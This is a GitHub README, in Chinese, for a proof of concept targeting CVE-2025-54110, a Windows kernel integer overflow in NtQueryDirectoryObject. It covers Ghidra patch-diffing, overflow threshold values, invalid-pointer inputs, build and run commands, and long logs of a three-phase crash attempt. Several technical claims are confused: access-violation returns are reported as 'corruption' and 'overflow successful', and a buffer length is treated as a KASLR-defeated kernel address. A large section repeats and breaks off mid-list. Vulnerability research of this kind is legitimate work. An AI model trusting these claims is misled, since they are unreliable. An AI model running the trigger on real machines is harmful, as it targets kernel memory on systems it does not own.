canomer/CVE-2025-54110-Kernel-EoP-PoC
GitHub: canomer/CVE-2025-54110-Kernel-EoP-PoC
针对 CVE-2025-54110(Windows 内核 NtQueryDirectoryObject 整数溢出漏洞)的仅崩溃 PoC,用于安全研究和教学,展示补丁比对方法论及现代内核防护机制的有效性。
Stars: 11 | Forks: 1
# CVE-2025-54110-Kernel-EoP-PoC
CVE-2025-54110 的 PoC 实现,这是 Windows `NtQueryDirectoryObject` 系统调用中的一个内核级整数溢出漏洞。
### CVE-2025-54110 - Windows 内核整数溢出分析
**CVE:** https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110
本仓库包含 CVE-2025-54110 内核 EoP 漏洞的**仅崩溃 PoC**,开发仅用于**安全研究、逆向工程和漏洞利用开发研究**。此代码旨在演示漏洞研究技术,包括:
- 使用 Ghidra Version Tracking 进行二进制比对
- Windows Patch Tuesday 分析
- 内核漏洞研究方法论
- 结构化异常处理 (SEH) 行为分析
此 PoC 不能实现权限提升或可靠的蓝屏 (BSOD)。它旨在安全地触发被 Windows 内核保护机制捕获的访问冲突。
## 概述
### CVE-2025-54110:Windows 内核 EoP 漏洞
**发布日期:** 2025 年 9 月(Windows 星期二安全补丁)
| 属性 | 值 |
|----------|-------|
| **CWE** | CWE-190:整数溢出或环绕 |
| **CVSS 3.1 评分** | 8.8 (高) / 7.7 (时间维度) |
| **向量字符串** | `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C` |
| **攻击向量** | 本地 |
| **攻击复杂度** | 低 |
| **所需权限** | 低 |
| **用户交互** | 无 |
| **影响范围** | 已改变 |
| **机密性** | 高 |
| **完整性** | 高 |
| **可用性** | 高 |
| **漏洞利用成熟度** | 未被证明 |
### 执行摘要
Windows 内核中的一个整数溢出漏洞允许经过身份验证的攻击者在本地潜在地提升权限。根据 Microsoft 的公告:
### 潜在影响
- 成功的攻击者可能获得 **SYSTEM 权限**
- 从用户模式受限进程实现沙箱逃逸
- 导致代码执行的内核内存损坏
### 可利用性评估
- **是否公开披露:** 否
- **是否在野外被利用:** 否
- **Microsoft 评估:** 更有可能被利用
## 研究方法论
### 1. 补丁分析工作流
```
Windows Update Files from Aug 2025 & Sep 2025 (KB.msu)
↓
Extract CAB Files
↓
Calculate SHA-256 Hashes (August vs September)
↓
Identify Changed Files
↓
Ghidra Version Tracking Analysis
↓
Setting Symbol Servers to Clarify Function Names
↓
Function-Level Diff Comparison
```
### 2. 分析的文件
初步分析集中在两个主要的内核组件上:
#### win32k.sys (-)
- **结果:** 未检测到显著变化
- **得分范围:** 0.97-1.0 (高相似度)
- **结论:** 不是 CVE-2025-54110 的受影响组件
#### ntoskrnl.exe (+)
- **结果:** 多个函数存在显著变化
- **得分范围:** 得分 ≤0.951 的函数
- **长度差异:** 检测到源与目标字节长度的变化
- **导出的总项目:** 2,036 个函数用于分析
### 3. Ghidra 版本跟踪结果
在 `ntoskrnl.exe` 中识别出的变化样本:
| 得分 | 置信度 | 源长度 | 目标长度 | 源函数 | 目标函数 |
|-------|------------|---------------|-------------|-----------------|---------------|
| 0.951 | 2.618 | 1023 | 365 | FUN_1403146d0 | FUN_1403a4ea0 |
| 0.950 | 2.285 | 113 | 203 | FUN_140680810 | FUN_1406d952c |
| 0.950 | 3.137 | 782 | 1050 | FUN_14032106c | FUN_140303a38 |
| 0.951 | 2.675 | 141 | 171 | FUN_140407bd0 | FUN_140a172a0 |
| 0.951 | 2.660 | 346 | 150 | FUN_140610e60 | FUN_1406115d4 |
## PoC 声明
### 技术方法
PoC (`precise_overflow_bsod.c`) 尝试通过以下方式触发整数溢出漏洞:
1. **精确阈值计算:** `0xfffffdbc` (源自 base=0x20, name=0x200)
2. **NtQueryDirectoryObject API:** 触发溢出的目标函数
3. **多阶段攻击策略:**
- 阶段 1:精确整数溢出尝试
- 阶段 2:内核内存定位
- 阶段 3:多线程利用
### 代码结构
```
// Key threshold values calculated for overflow
ULONG precise_thresholds[] = {
0xfffffdbc, // Precise threshold - base=0x20, name=0x200
0xfffffdbb, // Threshold - 1
0xfffffdbd, // Threshold + 1
0xfffffdba, // Threshold - 2
0xfffffdbe, // Threshold + 2
};
// Buffer configurations to test edge cases
PVOID buffer_types[] = {
VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE), // Normal buffer
VirtualAlloc(NULL, 0x10, MEM_COMMIT, PAGE_READWRITE), // Small buffer
NULL, // NULL pointer
(PVOID)0x4141414141414141, // Invalid pointer
(PVOID)0x0000000000000000, // Zero address
};
```
### 测试的漏洞利用向量
```
NtQueryDirectoryObject() Parameters:
├── DirectoryHandle: \BaseNamedObjects, \KernelObjects, etc.
├── Buffer: Various pointer configurations
├── BufferLength: Calculated overflow thresholds (0xfffffdbc variants)
├── ReturnSingleEntry: TRUE/FALSE variations
├── RestartScan: TRUE/FALSE variations
└── Context: Controlled iteration state
```
## 为什么 PoC 不会导致系统崩溃
### 实际结果
PoC 始终返回 `STATUS_ACCESS_VIOLATION (0xC0000005)` 而不会导致蓝屏死机 (BSOD)。这是**设计使然**,并演示了几种关键的 Windows 内核安全机制:
### 1. 结构化异常处理 (SEH)
```
User-Mode Input → NtQueryDirectoryObject
↓
ProbeForRead/Write
↓
__try { ... }
↓
Access Violation Detected
↓
__except { ... }
↓
Return STATUS_ACCESS_VIOLATION
```
**为什么有效:**
- Windows 内核系统调用将用户模式指针访问封装在异常处理程序中
- 无效的内存访问被**捕获**,而不是被允许传播
- 系统向调用者返回错误代码而不是崩溃
### 2. SMAP (管理模式访问阻止)
现代 CPU 功能,用于阻止内核模式 (Ring 0) 在未经明确授权的情况下访问用户模式 (Ring 3) 内存:
```
Kernel attempts to access user pointer
↓
SMAP checks permission (STAC/CLAC instructions)
↓
Unauthorized access detected
↓
CPU generates #PF (Page Fault)
↓
Caught by kernel exception handler
```
**对 PoC 的影响:**
- 即使发生溢出,从内核到用户的直接内存访问也会被阻止
- 防止利用指针解引用漏洞
### 3. KASLR (内核地址空间布局随机化)
```
Boot Time: Kernel Base = Random Address
↓
Hardcoded PoC address (0xfffffdbc)
↓
Does NOT match actual kernel structures
↓
Write to non-critical memory OR caught by SEH
```
**为什么不会发生 BSOD:**
- PoC 使用静态地址/阈值
- 真实的内核结构位于随机化的位置
- 写入操作未命中关键目标(例如,EPROCESS,Pool Headers)
### 4. 内核池完整性检查
Windows 10+ 实现了增强的池损坏检测:
```
Heap/Pool Allocation
↓
Header Contains:
├── Magic Values
├── Size Information
└── Checksums
↓
On Free/Access:
Validate Integrity
↓
Corruption Detected?
↓
[YES] → Safe Exception → Return Error
[NO] → Proceed Normally
```
## PoC 执行输出分析
### 预期输出
看到 `STATUS_ACCESS_VIOLATION (0xC0000005)` 即可,这很正常。
```
C:\Users\reLab\Desktop\cve>.\poc64.exe
==================================================
CVE-2025-54110 - Kernel Integer Overflow PoC
==================================================
[!] WARNING: This code may crash the system (BSOD).
[?] Do you want to continue? (y/n): y
[>] Targeting directory: \BaseNamedObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \KernelObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Sessions
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Windows
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[-] Exploit finished. If the system is still running, the attack may have been mitigated.
C:\Users\reLab\Desktop\cve>
```
### 详细实验
```
C:\Users\reLab\Desktop\cve>.\poc64_verbose11.exe
======================================================
CVE-2025-54110 PRECISION INTEGER OVERFLOW BSOD EXPLOIT
Threshold: 0xfffffdbc (base=0x20, name=0x200)
!!! WARNING: HIGH PROBABILITY OF SYSTEM CRASH !!!
======================================================
[+] Current user: desktop-lfkkhu2\relab
[+] Current PID: 1444
[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD!
[!] Continue? (y/n): y
[+] NT functions initialized successfully
[+] Using precise threshold: 0xfffffdbc
[+] Exploiting all directories with precise threshold...
[+] Precision exploiting: \BaseNamedObjects
[*] Phase 1: Precision overflow
[+] Starting precise integer overflow exploitation...
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=0, restart=0
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=0, restart=1
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=1, restart=0
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=1, restart=1
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=4, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
...
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[*] Phase 2: Kernel memory targeting
[+] Targeting kernel memory with precise threshold...
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[*] Phase 3: Multi-threaded BSOD
[+] Triggering precision BSOD with calculated threshold...
[+] Starting precise integer overflow exploitation...
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
...
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=0, restart=0
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=0, restart=1
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=1, restart=0
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=1, restart=1
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision overflow successful!
[+] Starting multi-threaded precision attack...
```
### 观察到的行为
```
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBB, status=0xC0000005
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBD, status=0xC0000005
```
**状态码:** `0xC0000005` = `STATUS_ACCESS_VIOLATION`
### 这意味着什么
| 方面 | 解释 |
|--------|----------------|
| **漏洞确认** | (+) 代码路径到达了受影响的函数 |
| **输入验证** | (!) 构造的输入触发了异常行为 |
| **系统稳定性** | (+) SEH 阻止了崩溃;系统保持稳定 |
| **DoS 达成** | (-) 没有 BSOD;异常处理成功 |
| **EoP 达成** | (-) 没有权限提升;受控的失败 |
### 按目标划分的成功标准
```
┌─────────────────────────────────────────────────────────┐
│ Objective │ Status │ Explanation │
├─────────────────────────────────────────────────────────┤
│ Vulnerability Research │ + │ Behavior change │
│ │ │ confirmed │
├─────────────────────────────────────────────────────────┤
│ Learning Experience │ + │ Kernel protections │
│ │ │ demonstrated │
├─────────────────────────────────────────────────────────┤
│ Crash (DoS/BSOD) │ - │ SEH prevented crash │
├─────────────────────────────────────────────────────────┤
│ Privilege Escalation │ - │ No code execution │
│ │ │ achieved │
└─────────────────────────────────────────────────────────┘
```
## 教育价值
### 此 PoC 演示了什么
#### 成果
1. **补丁比对方法论**
- 使用 Ghidra 比较补丁前后的二进制文件
- 通过版本跟踪识别修改的函数
- 分析基于得分的相似性指标
2. **Windows 内核架构**
- 理解系统调用流 (`NtQueryDirectoryObject`)
- 认识内核/用户模式边界
- 学习 NTAPI 内部函数
3. **安全机制行为**
- SEH 实战:异常被捕获与系统崩溃的对比
- SMAP 阻止未授权的内存访问
- KASLR 击败静态地址利用
4. **漏洞研究过程**
- CVE 分析和信息收集
- 逆向工程二进制变化
- 通过受控的漏洞利用尝试进行假设检验
#### 局限性
1. **现代内核保护是有效的**
- 简单的溢出尝试是不够的
- 必须绕过多层防御
- 单靠静态分析无法预测可利用性
2. **理论与实践之间的差距**
- 整数溢出存在 (理论上的)
- 实际利用需要:
- 信息泄露 (泄露内核地址)
- 堆喷射/Feng Shui
- ROP 链或其他代码执行原语
- 绕过 DEP、CFG、HVCI 等
## 优先分析的函数
基于 CVE-2025-54110 的特征 (整数溢出 → 内核中的缓冲区溢出),优先审查导出的 CSV 中处理以下内容的函数:
### 高优先级类别
```
Integer/Size Calculations:
- Functions with arithmetic operations on buffer sizes
- Length calculation before allocation
- Checked vs. unchecked math operations
Buffer/Memory Operations:
- memcpy, memmove, RtlCopyMemory variants
- ExAllocatePool* family
- Buffer size validation routines
Object Directory Handling:
- NtQueryDirectoryObject and related helpers
- ObpLookupDirectoryEntry
- Object enumeration functions
User-Mode Interface:
- ProbeForRead/Write wrappers
- Input validation functions
- IOCTL handlers
```
### 针对 2,036 个函数的过滤策略
**步骤 1:基于得分的过滤**
```
Score ≤ 0.951 AND (SourceLen ≠ DestLen)
```
**步骤 2:关键字搜索**
```
Function names containing:
- "Directory", "Object", "Query"
- "Buffer", "Length", "Size"
- "Allocate", "Copy", "Validate"
- "Integer", "Overflow", "Wrap"
```
**步骤 3:交叉引用分析**
```
Functions called by NtQueryDirectoryObject:
ObQueryNameString
ObpEnumerateDirectory
[Related helper functions]
```
**步骤 4:变化幅度**
```
Prioritize functions with:
- Length difference > 100 bytes
- Confidence score 2.0-3.5 (moderate changes)
```
## 构建和运行
### 前置条件
```
- Windows 10/11 (x64)
- Visual Studio 2019+ or MinGW-w64
- Administrator privileges (for syscall access)
```
### 编译
```
# 在 x64 Native Tools CLI for VS 20xx 上
# 使用 Visual Studio
cl.exe /Fe:poc64.exe precise_overflow_bsod.c ntdll.lib
# 或
cl poc.c /link /SUBSYSTEM:CONSOLE
```
```
# 使用 MinGW
gcc precise_overflow_bsod.c -o poc64.exe -lntdll
```
### 执行
```
# 以管理员权限运行
.\poc64.exe
```
**预期输出:**
```
[+] Current user: DESKTOP-XXXXXXX\user
[+] Current PID: 1234
[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD!
[!] Continue? (y/n): y
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[+] System is still running - protections may be active.
```
## 资源与参考
### 官方来源
- [Microsoft 安全公告 - CVE-2025-54110](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110)
- [CWE-190:整数溢出或环绕](https://cwe.mitre.org/data/definitions/190.html)
- [Windows 内核内部机制 - Microsoft 文档](https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/)
### 研究工具
- [Ghidra - NSA 软件逆向工程套件](https://ghidra-sre.org/)
- [WinDbg - Windows 调试工具](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/)
### 相关阅读
- [内核漏洞利用开发](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/)
- [Windows 内核漏洞利用](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver)
- [使用 Ghidra 进行补丁比对](https://www.youtube.com/watch?v=K83T7iVla5s)
## 法律免责声明
此代码仅出于教育目的提供。
请勿将此代码用于:
• 未经授权访问计算机系统
• 恶意攻击或破坏
• 任何非法活动
作者对滥用行为不承担任何责任。
用户必须遵守所有适用法律。
**使用此代码即表示您承认:**
1. 您已获得在目标系统上进行测试的授权
2. 您了解您所在司法管辖区的法律含义
3. 您对您的行为承担全部责任
4. 这是为了学习,而不是为了恶意活动
## 法律免责声明
本仓库严格仅限于在受控实验室环境中用于教育、防御性安全研究和漏洞重现目的。
信息和概念验证代码旨在帮助防御者、研究人员和供应商理解并修复已报告的漏洞。
未经明确许可,针对系统未经授权或恶意使用此代码可能违反适用的法律法规。
作者不鼓励或纵容非法活动,并且对因滥用此材料造成的损坏不承担任何责任。
此漏洞披露报告旨在用于:
1. 安全研究和教育
2. 供应商通知和补丁开发
3. 保护最终用户
4. 学术和防御性安全目的
**禁止的用途:**
- 未经授权访问计算机系统
- 恶意利用
- 任何非法活动
研究人员在受控环境中对其个人拥有的系统进行了所有测试。未对第三方系统进行任何未经授权的访问。
**报告版本:** 1.0
**最后更新:** 2026 年 2 月 9 日
## 联系方式
如有正当的安全研究查询或教育合作:
**负责任的披露:**
- 关于此 PoC 的安全问题 → 提出 GitHub Issue
- 真正的 CVE-2025-54110 漏洞利用 → 报告给 [MSRC](https://msrc.microsoft.com/)
## 许可证
```
MIT License - See LICENSE file for details
Educational software provided "as is" without warranty.
Use at your own risk.
```
### 详细实验
```
C:\Users\reLab\Desktop\cve>.\poc64_verbose11.exe
======================================================
CVE-2025-54110 PRECISION INTEGER OVERFLOW BSOD EXPLOIT
Threshold: 0xfffffdbc (base=0x20, name=0x200)
!!! WARNING: HIGH PROBABILITY OF SYSTEM CRASH !!!
======================================================
[+] Current user: desktop-lfkkhu2\relab
[+] Current PID: 1444
[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD!
[!] Continue? (y/n): y
[+] NT functions initialized successfully
[+] Using precise threshold: 0xfffffdbc
[+] Exploiting all directories with precise threshold...
[+] Precision exploiting: \BaseNamedObjects
[*] Phase 1: Precision overflow
[+] Starting precise integer overflow exploitation...
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=0, restart=0
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=0, restart=1
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=1, restart=0
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=1, restart=1
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=4, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
...
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[*] Phase 2: Kernel memory targeting
[+] Targeting kernel memory with precise threshold...
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[*] Phase 3: Multi-threaded BSOD
[+] Triggering precision BSOD with calculated threshold...
[+] Starting precise integer overflow exploitation...
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
...
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=0, restart=0
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=0, restart=1
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=1, restart=0
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=1, restart=1
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision overflow successful!
[+] Starting multi-threaded precision attack...
```
### 观察到的行为
```
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBB, status=0xC0000005
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBD, status=0xC0000005
```
**状态码:** `0xC0000005` = `STATUS_ACCESS_VIOLATION`
### 这意味着什么
| 方面 | 解释 |
|--------|----------------|
| **漏洞确认** | (+) 代码路径到达了受影响的函数 |
| **输入验证** | (!) 构造的输入触发了异常行为 |
| **系统稳定性** | (+) SEH 阻止了崩溃;系统保持稳定 |
| **DoS 达成** | (-) 没有 BSOD;异常处理成功 |
| **EoP 达成** | (-) 没有权限提升;受控的失败 |
### 按目标划分的成功标准
```
┌─────────────────────────────────────────────────────────┐
│ Objective │ Status │ Explanation │
├─────────────────────────────────────────────────────────┤
│ Vulnerability Research │ + │ Behavior change │
│ │ │ confirmed │
├─────────────────────────────────────────────────────────┤
│ Learning Experience │ + │ Kernel protections │
│ │ │ demonstrated │
├─────────────────────────────────────────────────────────┤
│ Crash (DoS/BSOD) │ - │ SEH prevented crash │
├─────────────────────────────────────────────────────────┤
│ Privilege Escalation │ - │ No code execution │
│ │ │ achieved │
└─────────────────────────────────────────────────────────┘
```
## 教育价值
### 此 PoC 演示了什么
#### 成果
1. **补丁比对方法论**
- 使用 Ghidra 比较补丁前后的二进制文件
- 通过版本跟踪识别修改的函数
- 分析基于得分的相似性指标
2. **Windows 内核架构**
- 理解系统调用流 (`NtQueryDirectoryObject`)
- 认识内核/用户模式边界
- 学习 NTAPI 内部函数
3. **安全机制行为**
- SEH 实战:异常被捕获与系统崩溃的对比
- SMAP 阻止未授权的内存访问
- KASLR 击败静态地址利用
4. **漏洞研究过程**
- CVE 分析和信息收集
- 逆向工程二进制变化
- 通过受控的漏洞利用尝试进行假设检验
#### 局限性
1. **现代内核保护是有效的**
- 简单的溢出尝试是不够的
- 必须绕过多层防御
- 单靠静态分析无法预测可利用性
2. **理论与实践之间的差距**
- 整数溢出存在 (理论上的)
- 实际利用需要:
- 信息泄露 (泄露内核地址)
- 堆喷射/Feng Shui
- ROP 链或其他代码执行原语
- 绕过 DEP、CFG、HVCI 等
## 优先分析的函数
基于 CVE-2025-54110 的特征 (整数溢出 → 内核中的缓冲区溢出),优先审查导出的 CSV 中处理以下内容的函数:
### 高优先级类别
```
Integer/Size Calculations:
- Functions with arithmetic operations on buffer sizes
- Length calculation before allocation
- Checked vs. unchecked math operations
Buffer/Memory Operations:
- memcpy, memmove, RtlCopyMemory variants
- ExAllocatePool* family
- Buffer size validation routines
Object Directory Handling:
- NtQueryDirectoryObject and related helpers
- ObpLookupDirectoryEntry
- Object enumeration functions
User-Mode Interface:
- ProbeForRead/Write wrappers
- Input validation functions
- IOCTL handlers
```
### 针对 2,036 个函数的过滤策略
**步骤 1:基于得分的过滤**
```
Score ≤ 0.951 AND (SourceLen ≠ DestLen)
```
**步骤 2:关键字搜索**
```
Function names containing:
- "Directory", "Object", "Query"
- "Buffer", "Length", "Size"
- "Allocate", "Copy", "Validate"
